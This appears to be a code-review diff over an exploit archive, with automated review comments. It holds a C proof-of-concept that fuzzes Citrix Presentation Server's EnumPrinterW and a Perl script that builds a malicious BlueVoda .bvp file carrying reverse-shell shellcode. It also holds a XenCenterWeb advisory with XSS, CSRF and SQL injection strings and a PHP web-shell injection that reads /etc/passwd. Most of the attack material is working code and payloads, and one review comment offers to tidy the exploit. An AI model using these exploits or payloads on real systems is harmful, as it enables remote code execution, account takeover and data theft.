EnumPrintersA ( PRINTER_ENUM_NAME, (char *)lpName, level, NULL, 0, &dwSizeNeeded, &n ); EnumPrintersA ( PRINTER_ENUM_NAME, (char *)lpName, level, NULL, 0, &dwSizeNeeded, &n );
} }
if (dwSizeNeeded==0) { if (dwSizeNeeded==0) {
#ifdef _DBG_ #ifdef _DBG_
printf ( "EnumPrintersX() Invalid. Error: %d \n",GetLastError() ); printf ( "EnumPrintersX() Invalid. Error: %d \n",GetLastError() );
#endif #endif
return(-1); return(-1);
} }
lpInfo = (void *)HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY, dwSizeNeeded ); lpInfo = (void *)HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY, dwSizeNeeded );
if ( lpInfo != NULL ) { if ( lpInfo != NULL ) {
if (opt & OPT_UNICODE) { if (opt & OPT_UNICODE) {
ret=EnumPrintersW ( PRINTER_ENUM_NAME,(wchar_t *)lpName,level,(LPBYTE)lpInfo,dwSizeNeeded,&dwSizeNeeded,&n); ret=EnumPrintersW ( PRINTER_ENUM_NAME,(wchar_t *)lpName,level,(LPBYTE)lpInfo,dwSizeNeeded,&dwSizeNeeded,&n);
} else { } else {
ret=EnumPrintersA ( PRINTER_ENUM_NAME,(char *)lpName,level,(LPBYTE)lpInfo,dwSizeNeeded,&dwSizeNeeded,&n); ret=EnumPrintersA ( PRINTER_ENUM_NAME,(char *)lpName,level,(LPBYTE)lpInfo,dwSizeNeeded,&dwSizeNeeded,&n);
} }
if ( ret== 0 ) if ( ret== 0 )
{ {
#ifdef _DBG_ #ifdef _DBG_
printf ( "EnumPrintersX() Failed. Error: %d ( %i)\n",GetLastError(),dwSizeNeeded ); printf ( "EnumPrintersX() Failed. Error: %d ( %i)\n",GetLastError(),dwSizeNeeded );
#endif #endif
HeapFree ( GetProcessHeap (), 0, lpInfo ); HeapFree ( GetProcessHeap (), 0, lpInfo );
return 0; return 0;
} else { } else {
PRINTER_INFO_1 *dataI; PRINTER_INFO_1 *dataI;
PRINTER_INFO_2 *dataII; PRINTER_INFO_2 *dataII;
for ( i=0; i < n; i++ ) { for ( i=0; i < n; i++ ) {
dataI=(PRINTER_INFO_1*)lpInfo; dataI=(PRINTER_INFO_1*)lpInfo;
printf("%s",padding); printf("%s",padding);
if (opt & OPT_UNICODE) { if (opt & OPT_UNICODE) {
if (dataI[i].pName) printf(" %S - ",(dataI[i].pName)); if (dataI[i].pName) printf(" %S - ",(dataI[i].pName));
if (dataI[i].pDescription) printf(" %S ",(dataI[i].pDescription)); if (dataI[i].pDescription) printf(" %S ",(dataI[i].pDescription));
//if (dataI[i].pComment) printf(" %S - ",(dataI[i].pComment)); //if (dataI[i].pComment) printf(" %S - ",(dataI[i].pComment));
} else { } else {
if (dataI[i].pName) printf(" %s - ",(dataI[i].pName)); if (dataI[i].pName) printf(" %s - ",(dataI[i].pName));
if (dataI[i].pDescription) printf(" %s ",(dataI[i].pDescription)); if (dataI[i].pDescription) printf(" %s ",(dataI[i].pDescription));
//if (dataI[i].pComment) printf(" %s - ",(dataI[i].pComment)); //if (dataI[i].pComment) printf(" %s - ",(dataI[i].pComment));
} }
printf("\n"); printf("\n");
for(j=0;j<sizeof(CustomFuzzSize)/sizeof(int);j++) { for(j=0;j<sizeof(CustomFuzzSize)/sizeof(int);j++) {
if (opt & OPT_UNICODE) { if (opt & OPT_UNICODE) {
Fuzzer( (wchar_t *) dataI[0].pName, j,opt & OPT_UNICODE); Fuzzer( (wchar_t *) dataI[0].pName, j,opt & OPT_UNICODE);
ShowPrinterInfo((wchar_t*)dst,level, OPT_UNICODE, newpadding); ShowPrinterInfo((wchar_t*)dst,level, OPT_UNICODE, newpadding);
} else { } else {
Fuzzer( (wchar_t *) dataI[0].pName, j,opt & OPT_UNICODE); Fuzzer( (wchar_t *) dataI[0].pName, j,opt & OPT_UNICODE);
ShowPrinterInfo((wchar_t*)dst,level, 0, newpadding); ShowPrinterInfo((wchar_t*)dst,level, 0, newpadding);
} }
} }
if (opt & RECURSIVE ) { if (opt & RECURSIVE ) {
strcpy (newpadding,padding); strcpy (newpadding,padding);
strcat(newpadding,"---"); strcat(newpadding,"---");
newpadding[1]='+'; newpadding[1]='+';
ShowPrinterInfo(dataI[i].pName,level, opt, newpadding); ShowPrinterInfo(dataI[i].pName,level, opt, newpadding);
} }
printf("\n"); printf("\n");
} }
HeapFree ( GetProcessHeap (), 0, lpInfo ); HeapFree ( GetProcessHeap (), 0, lpInfo );
} }
} }
return(1); return(1);
} }
int testPrinters(void) { int testPrinters(void) {
DWORD size,ret,err; DWORD size,ret,err;
ret=EnumPrintersW ( PRINTER_ENUM_NAME, NULL, 1, NULL, 0, &size, &size ); ret=EnumPrintersW ( PRINTER_ENUM_NAME, NULL, 1, NULL, 0, &size, &size );
if ( ret==0 ) { if ( ret==0 ) {
err=GetLastError(); err=GetLastError();
if (err!=122) { //size error if (err!=122) { //size error
printf("[-] Printer Service not available - Error: %d\n",err ); printf("[-] Printer Service not available - Error: %d\n",err );
exit(-1); exit(-1);
} }
} }
return(1); return(1);
} }
int main ( int argc, char *argv[] ) int main ( int argc, char *argv[] )
{ {
printf("[+] Citrix Presentation Server - Local EnumPrinterW() POC exploit\n"); printf("[+] Citrix Presentation Server - Local EnumPrinterW() POC exploit\n");
printf("[+] Discovered by ZDI - http://secunia.com/advisories/23869/\n"); printf("[+] Discovered by ZDI - http://secunia.com/advisories/23869/\n");
printf("[+] Proof of concept by Andres Tarasco - atarasco@514.es\n\n"); printf("[+] Proof of concept by Andres Tarasco - atarasco@514.es\n\n");
if (argc!=2) usage(argv[0]); if (argc!=2) usage(argv[0]);
testPrinters(); testPrinters();
printf("[+] Printer Service Seems to be working.. Fuzzing\n"); printf("[+] Printer Service Seems to be working.. Fuzzing\n");
if ( (argv[1][1]=='u')) { if ( (argv[1][1]=='u')) {
ShowPrinterInfo(NULL,1,3,"[*]"); ShowPrinterInfo(NULL,1,3,"[*]");
testPrinters(); testPrinters();
} }
if ( (argv[1][1]=='a')) { if ( (argv[1][1]=='a')) {
ShowPrinterInfo(NULL,1,1,"[*]"); ShowPrinterInfo(NULL,1,1,"[*]");
testPrinters(); testPrinters();
} }
return(0); return(0);
} }
// milw0rm.com [2007-01-26] // milw0rm.com [2007-01-26]
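Review bot: this hunk replaces all 179 lines with 179 lines whose text is identical on both sides (`/* /*`, `#include <stdio.h> #include <stdio.h>`, and so on), so the only change can be whitespace or line endings; the commit message "17 new exploits" does not mention touching an existing 2007 milw0rm entry, and a whitespace-only rewrite makes the file's history harder to blame. If a line-ending normalization is intended, say so in the message or put it in a separate commit. Unrelated to the change but visible here: `Fuzzer()` computes `len` with `strlen` for the ANSI case but then sets `j=wcslen(orig);` and uses `j` as the offset at which the `'A'` padding is written for both the Unicode and ANSI paths, so ANSI printer names get their padding at the wrong offset.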


@ -0,0 +1,77 @@
source: http://www.securityfocus.com/bid/47753/info
BlueVoda Website Builder is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
BlueVoda Website Builder 11 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1 ______ 0
0 .-" "-. 1
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0
0 Algerian HaCker | | > Site : 1337day.com | 1
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0
0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1
1 _ ) \_______\__|IIIIII|__/_______________________ 0
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1
1 )_/ \ / 0
0 (@ `--------` . 2011, Inj3ct0r Team 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
# ---------
# BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com>
# special thanks to : Inj3ct0r Team + Exploit-Id Team
# Tested in Windows XP sp3 France
# ---------
logo();
my $header = # BlueVoda Project (bvp) Header
"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09";
my $jump = "\xeb\x02\x90\x90" ; # short jump - from BlueVoda.exe
my $call = "\xff\x52\x7c"; # Call - from BlueVoda.exe
my $junk = "\x41" x 321; # Buffer
my $nops = "\x90" x 51; # Nopsled
# windows/shell_reverse_tcp - 340 bytes (http://www.metasploit.com)
# LHOST=127.0.0.1, LPORT=4444, Encoder: x86/call4_dword_xor
my $shell =
"\x29\xc9\x83\xe9\xb1\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\x4e\x5a\xfa\xc3\x83\xee\xfc\xe2\xf4\xb2\xb2\x73\xc3" .
"\x4e\x5a\x9a\x4a\xab\x6b\x28\xa7\xc5\x08\xca\x48\x1c\x56" .
"\x71\x91\x5a\xd1\x88\xeb\x41\xed\xb0\xe5\x7f\xa5\xcb\x03" .
"\xe2\x66\x9b\xbf\x4c\x76\xda\x02\x81\x57\xfb\x04\xac\xaa" .
"\xa8\x94\xc5\x08\xea\x48\x0c\x66\xfb\x13\xc5\x1a\x82\x46" .
"\x8e\x2e\xb0\xc2\x9e\x0a\x71\x8b\x56\xd1\xa2\xe3\x4f\x89" .
"\x19\xff\x07\xd1\xce\x48\x4f\x8c\xcb\x3c\x7f\x9a\x56\x02" .
"\x81\x57\xfb\x04\x76\xba\x8f\x37\x4d\x27\x02\xf8\x33\x7e" .
"\x8f\x21\x16\xd1\xa2\xe7\x4f\x89\x9c\x48\x42\x11\x71\x9b" .
"\x52\x5b\x29\x48\x4a\xd1\xfb\x13\xc7\x1e\xde\xe7\x15\x01" .
"\x9b\x9a\x14\x0b\x05\x23\x16\x05\xa0\x48\x5c\xb1\x7c\x9e" .
"\x26\x69\xc8\xc3\x4e\x32\x8d\xb0\x7c\x05\xae\xab\x02\x2d" .
"\xdc\xc4\xb1\x8f\x42\x53\x4f\x5a\xfa\xea\x8a\x0e\xaa\xab" .
"\x67\xda\x91\xc3\xb1\x8f\xaa\x93\x1e\x0a\xba\x93\x0e\x0a" .
"\x92\x29\x41\x85\x1a\x3c\x9b\xd3\x3d\xab\x31\x5a\xfa\xc2" .
"\x26\x58\xfa\xd2\x12\xd3\x1c\xa9\x5e\x0c\xad\xab\xd7\xff" .
"\x8e\xa2\xb1\x8f\x92\xa0\x23\x3e\xfa\x4a\xad\x0d\xad\x94" .
"\x7f\xac\x90\xd1\x17\x0c\x18\x3e\x28\x9d\xbe\xe7\x72\x5b" .
"\xfb\x4e\x0a\x7e\xea\x05\x4e\x1e\xae\x93\x18\x0c\xac\x85" .
"\x18\x14\xac\x95\x1d\x0c\x92\xba\x82\x65\x7c\x3c\x9b\xd3" .
"\x1a\x8d\x18\x1c\x05\xf3\x26\x52\x7d\xde\x2e\xa5\x2f\x78" .
"\xbe\xef\x58\x95\x26\xfc\x6f\x7e\xd3\xa5\x2f\xff\x48\x26" .
"\xf0\x43\xb5\xba\x8f\xc6\xf5\x1d\xe9\xb1\x21\x30\xfa\x90" .
"\xb1\x8f\xfa\xc3";
my $exploit = $header.$jump.$junk.$call.$shell.$nops;
open(myfile,'>>KedAns.bvp');
print myfile $exploit;
close (myfile);
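Review bot: `open(myfile,'>>KedAns.bvp')` opens the output in append mode and never checks the result, so a second run appends a second copy to the same file and a failed open is silently ignored before `print myfile $exploit`; `open(my $fh, '>', 'KedAns.bvp') or die "open: $!";` with a lexical filehandle is the idiomatic form, and `use strict; use warnings;` are missing entirely. `system("cls")` at the top ties the script to Windows without saying so, while the header comment only states the test platform (Windows XP SP3). The shellcode block is documented as LHOST=127.0.0.1, i.e. a loopback reverse shell, which is worth stating beside the `$shell` declaration for anyone triaging the sample rather than only in the metasploit comment above it.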


@ -1,151 +1,151 @@
Secure Network - Security Research Advisory Secure Network - Security Research Advisory
Vuln name: Citrix XenCenterWeb Multiple Vulnerabilities Vuln name: Citrix XenCenterWeb Multiple Vulnerabilities
Systems affected: Citrix XenCenterWeb Systems affected: Citrix XenCenterWeb
Systems not affected: n/a Systems not affected: n/a
Severity: High Severity: High
Local/Remote: Remote Local/Remote: Remote
Vendor URL: http://www.citrix.com Vendor URL: http://www.citrix.com
Author(s): Alberto Trivero a.trivero@securenetwork.it - Author(s): Alberto Trivero a.trivero@securenetwork.it -
Claudio Criscione c.criscione@securenetwork.it Claudio Criscione c.criscione@securenetwork.it
Vendor disclosure: 1/06/2009 Vendor disclosure: 1/06/2009
Vendor acknowledged: 11/06/2009 Vendor acknowledged: 11/06/2009
Vendor patch release: n/a Vendor patch release: n/a
Public disclosure: 06/07/2009 Public disclosure: 06/07/2009
Advisory number: SN-2009-01 Advisory number: SN-2009-01
Advisory URL: http://securenetwork.it/ricerca/advisory/download/SN-2009-01.txt Advisory URL: http://securenetwork.it/ricerca/advisory/download/SN-2009-01.txt
*** SUMMARY *** *** SUMMARY ***
Citrix XenCenterWeb is a web interface for Citrix XenServer environment Citrix XenCenterWeb is a web interface for Citrix XenServer environment
management. management.
Users of XenCenterWeb will be able to see a list of Virtual Machines in the Users of XenCenterWeb will be able to see a list of Virtual Machines in the
Resource Pool, perform life-cycle actions (start, shutdown, restart, etc.), Resource Pool, perform life-cycle actions (start, shutdown, restart, etc.),
get basic information about the hosts in the Resource Pools, information about get basic information about the hosts in the Resource Pools, information about
the VMs and also connect to the console of the VMs. the VMs and also connect to the console of the VMs.
Due to poor validation of some user controlled inputs, a variety of attacks Due to poor validation of some user controlled inputs, a variety of attacks
against the application and the underlying server are possible. against the application and the underlying server are possible.
Cross-site scripting, cross-site request forgery, SQL injection and remote Cross-site scripting, cross-site request forgery, SQL injection and remote
command execution attack vectors were identified as well. command execution attack vectors were identified as well.
XSS and CSRF attacks can be performed on the virtual appliance itself, while XSS and CSRF attacks can be performed on the virtual appliance itself, while
the others require the PHP parameter magic_quotes_gpc to be off on the web the others require the PHP parameter magic_quotes_gpc to be off on the web
server. server.
*** VULNERABILITY DETAILS *** *** VULNERABILITY DETAILS ***
(a) Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF) (a) Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF)
With the default PHP configuration (register_globals=Off and With the default PHP configuration (register_globals=Off and
magic_quotes_gpc=On), both XSS and CSRF attacks can be executed. magic_quotes_gpc=On), both XSS and CSRF attacks can be executed.
The first XSS attack exploits the lack of sanitization in the username The first XSS attack exploits the lack of sanitization in the username
parameter in edituser.php script and requires the victim to be able to access parameter in edituser.php script and requires the victim to be able to access
configuration scripts: configuration scripts:
https://xencenterweb.loc/config/edituser.php?username=1<script>alert(document.cookie)</script> https://xencenterweb.loc/config/edituser.php?username=1<script>alert(document.cookie)</script>
Under the same conditions, a CSRF attack can be executed to change the Under the same conditions, a CSRF attack can be executed to change the
password of an arbitrary user: password of an arbitrary user:
https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd] https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd]
Another CSRF attack can hard stop a VM of the attacker's choice: Another CSRF attack can hard stop a VM of the attacker's choice:
https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname] https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname]
Other XSS vulnerabilities afflict scripts which are accessible by anyone: Other XSS vulnerabilities afflict scripts which are accessible by anyone:
https://xencenterweb.loc/console.php?location=1"><script>alert(document.cookie)</script><"&vmname=myVM https://xencenterweb.loc/console.php?location=1"><script>alert(document.cookie)</script><"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1"><script>alert(123)</script><"&vmname=myVM https://xencenterweb.loc/console.php?location=1&sessionid=1"><script>alert(123)</script><"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM<script>alert(123)</script> https://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM<script>alert(123)</script>
https://xencenterweb.loc/forcerestart.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM https://xencenterweb.loc/forcerestart.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM
https://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><" https://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><"
https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><" https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><"
https://xencenterweb.loc/forcesd.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM https://xencenterweb.loc/forcesd.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM
(b) SQL Injection (b) SQL Injection
The username parameter in the login.php script is vulnerable to a Blind SQL The username parameter in the login.php script is vulnerable to a Blind SQL
Injection attack. Injection attack.
An attacker can retrieve the whole database schema through specially crafted An attacker can retrieve the whole database schema through specially crafted
requests. requests.
Here is an example proof of concept: Here is an example proof of concept:
https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE
'root@%', benchmark(1000000,sha1('test')), 'false')/* 'root@%', benchmark(1000000,sha1('test')), 'false')/*
Obviously, other high profile attacks can be performed through this attack Obviously, other high profile attacks can be performed through this attack
vector. vector.
(c) Remote Command Execution (c) Remote Command Execution
An attacker could write arbitrary data in the file An attacker could write arbitrary data in the file
/usr/local/lib/php/include/config.ini.php /usr/local/lib/php/include/config.ini.php
through the file /var/www/config/writeconfig.php. Due to this unsecure behavior, through the file /var/www/config/writeconfig.php. Due to this unsecure behavior,
arbitrary commands can be executed on the machine. arbitrary commands can be executed on the machine.
If a victim with the proper authorization follows this link: If a victim with the proper authorization follows this link:
https://xencenterweb.loc/config/writeconfig.php?pool1='; ?> <?php $cmd = https://xencenterweb.loc/config/writeconfig.php?pool1='; ?> <?php $cmd =
$_REQUEST['cmd']; passthru($cmd); ?> <?php $xen = ' $_REQUEST['cmd']; passthru($cmd); ?> <?php $xen = '
or this URL encoded version: or this URL encoded version:
https://xencenterweb.loc/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20%3C%3Fphp%20%24xen%20%3D%20%27 https://xencenterweb.loc/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20%3C%3Fphp%20%24xen%20%3D%20%27
an attacker can then simply execute commands on the system through the an attacker can then simply execute commands on the system through the
console.php file: console.php file:
https://xencenterweb.loc/console.php?cmd=cat%20/etc/passwd; https://xencenterweb.loc/console.php?cmd=cat%20/etc/passwd;
*** EXPLOIT *** *** EXPLOIT ***
Attackers may exploit these issues through a common browser as explained Attackers may exploit these issues through a common browser as explained
above. above.
*** FIX INFORMATION *** *** FIX INFORMATION ***
No patch is currently provided by Citrix, and the application download has No patch is currently provided by Citrix, and the application download has
been removed. been removed.
Citrix officially stated that "the tool was created to demonstrate how the SDK Citrix officially stated that "the tool was created to demonstrate how the SDK
could be used to create unique solutions. Customers currently using it should could be used to create unique solutions. Customers currently using it should
assess the risks of continued use in light of your findings and, if these prove assess the risks of continued use in light of your findings and, if these prove
to be unacceptable, discontinue usage". to be unacceptable, discontinue usage".
*** WORKAROUNDS *** *** WORKAROUNDS ***
Common web application workarounds apply, like virtual patching from a web Common web application workarounds apply, like virtual patching from a web
application firewall or similar solutions. However most of the reported issues application firewall or similar solutions. However most of the reported issues
can be mitigated by running the application only inside the virtual appliance can be mitigated by running the application only inside the virtual appliance
or in properly configured web servers. or in properly configured web servers.
Secure Network would like to thank Citrix for its support during the Secure Network would like to thank Citrix for its support during the
disclosure process. disclosure process.
********************* *********************
*** LEGAL NOTICES *** *** LEGAL NOTICES ***
********************* *********************
Secure Network (www.securenetwork.it) is an information security company, Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security which provides consulting and training services, and engages in security
research and development. research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure. whenever possible with software developers for properly handling disclosure.
This advisory is copyright 2009 Secure Network S.r.l. Permission is This advisory is copyright 2009 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network. databases and similars, provided that due credit is given to Secure Network.
The information in the advisory is believed to be accurate at the time of The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information. research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect, Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, or consequential loss or damage arising from use of, or reliance on,
this information. this information.
If you have any comments or inquiries, or any issue with what is reported If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible. in this advisory, please inform us as soon as possible.
E-mail: securenetwork {at} securenetwork.it E-mail: securenetwork {at} securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24126788 Phone: +39 02 24126788
# milw0rm.com [2009-07-10] # milw0rm.com [2009-07-10]
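Review bot: every line in this hunk shows the same text on both sides, so this is a whitespace or line-ending-only rewrite of the existing SN-2009-01 advisory rather than a content change; committing such normalisations separately keeps the history reviewable and the addition count meaningful. On the content itself, the FIX INFORMATION and WORKAROUNDS sections state that Citrix provides no patch and has withdrawn the download, with virtual patching or confinement to the virtual appliance as the only mitigations; that status is the most useful fact for defenders and would be worth surfacing in the entry's metadata alongside the advisory URL.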